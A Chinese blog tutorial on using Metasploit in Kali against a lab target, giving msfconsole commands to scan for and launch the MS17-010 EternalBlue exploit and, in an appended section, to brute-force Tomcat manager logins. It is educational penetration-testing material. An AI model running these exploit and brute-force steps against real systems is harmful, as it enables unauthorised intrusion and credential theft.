Kali玩转Metasploit 实现安全漏洞检测

本文介绍Metasploit这一强大的渗透测试框架,演示了如何利用Metasploit进行漏洞扫描及渗透测试过程,包括查找和使用特定漏洞模块,如smb_ms17_010,配置参数并执行渗透攻击。

          Metasploit就是一个漏洞框架,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。

!!!Metasploit中一个模块对应检测一个漏洞。

关于Metasploit的一些专业术语:

               渗透攻击(Exploit),指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。

               攻击载荷(Payload),是我们期望目标系统在被渗透攻击之后去执行的代码。

               Shellcode,是在渗透攻击是作为攻击载荷运行的一组机器指令,通常用汇编语言编写。

               模块(Module),指Metasploit框架中所使用的一段软件代码组件,可用于发起渗透攻击或执行某些辅助攻击动作。

               监听器(Listener),是Metasploit中用来等待网络连接的组件。

           现在我就开始使用Metasploit来查找漏洞

           第一步:终端打开metasploit 

        输入help 查看msfconsole 常用命令

         第二步:在metasploit靶机中存在smb_ms17_010服务漏洞,针对此漏洞进行渗透测试,在metasploit中查找攻击smb_ms17_010的模块   search smb_ms17_010  

           第三步:确定该模块路径后,我们使用该模块进行渗透测试: use auxiliary/scanner/smb/smb_ms17_010

          1.可通过info查看相应的信息

  2.在确定攻击模块后,我们查看与该模块对应兼容的攻击载荷(参考资料解释:攻击载荷是渗透攻击成功后促使目标系统运行的一段植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接) 使用 show payloads

   3.可使用 show options 查看需要配置的参数  (yes为必填参数)

 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue

           第四步:看到RHOST需要设置,其它选择默认设置,将RHOST设置为靶机IP10.1.1.46    set Rhosts 10.1.1.46 

                 

           设置全部完成,开始执行渗透,输入命令 “exploit”开始执行:

 

           没有会话产生表示没有成功,因为没有这个漏洞。

          关于成功的案例我会在下次的博客说明,现在先学习如何使用。

### 如何在 Kali Linux 上使用 Metasploit 进行漏洞利用 #### 启动 Metasploit Framework 要在 Kali Linux 中启动 Metasploit,需打开终端并输入 `msfconsole` 命令来启动控制台[^2]。 ```bash msfconsole ``` #### 加载特定模块 对于具体类型的漏洞利用,比如针对 SMB 协议中存在的 MS17-010 漏洞,可以加载相应的 exploit 模块。通过搜索功能找到合适的模块: ```plaintext search smb_ms17_010 ``` 之后选择适合的 exploit 并使用它: ```plaintext use exploit/windows/smb/ms17_010_eternalblue ``` #### 设置目标参数 设定要攻击的目标 IP 地址以及任何其他必要的选项,例如 RHOSTS 参数指定远程主机地址: ```plaintext set RHOSTS 192.168.x.x ``` #### 执行漏洞检测或利用 如果只是想要验证目标机器是否有此漏洞,则可以选择执行 check 动作;如果是实际进行攻击操作则直接 run : ```plaintext check run ``` 当涉及到像 Apache Tomcat 密码猜测这样的场景时,会采用不同的辅助扫描器模块来进行暴力破解尝试。这通常涉及如下几个步骤[^4]: 1. **选择模块**: 使用 tomcat_mgr_login 辅助模块。 ```plaintext use auxiliary/scanner/http/tomcat_mgr_login ``` 2. **配置目标信息** - 设定目标主机 IP (RHOSTS) ```plaintext set RHOSTS 192.168.213.129 ``` - 调整线程数以提高效率但不过度消耗资源(THREADS) ```plaintext set THREADS 5 ``` - 控制爆破速率避免给服务器带来过大压力(BRUTEFORCE_SPEED) ```plaintext set BRUTEFORCE_SPEED 3 ``` 3. **发起攻击** ```plaintext run ``` 一旦成功获取到有效凭证,就可以进一步探索受控系统的更多信息了。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值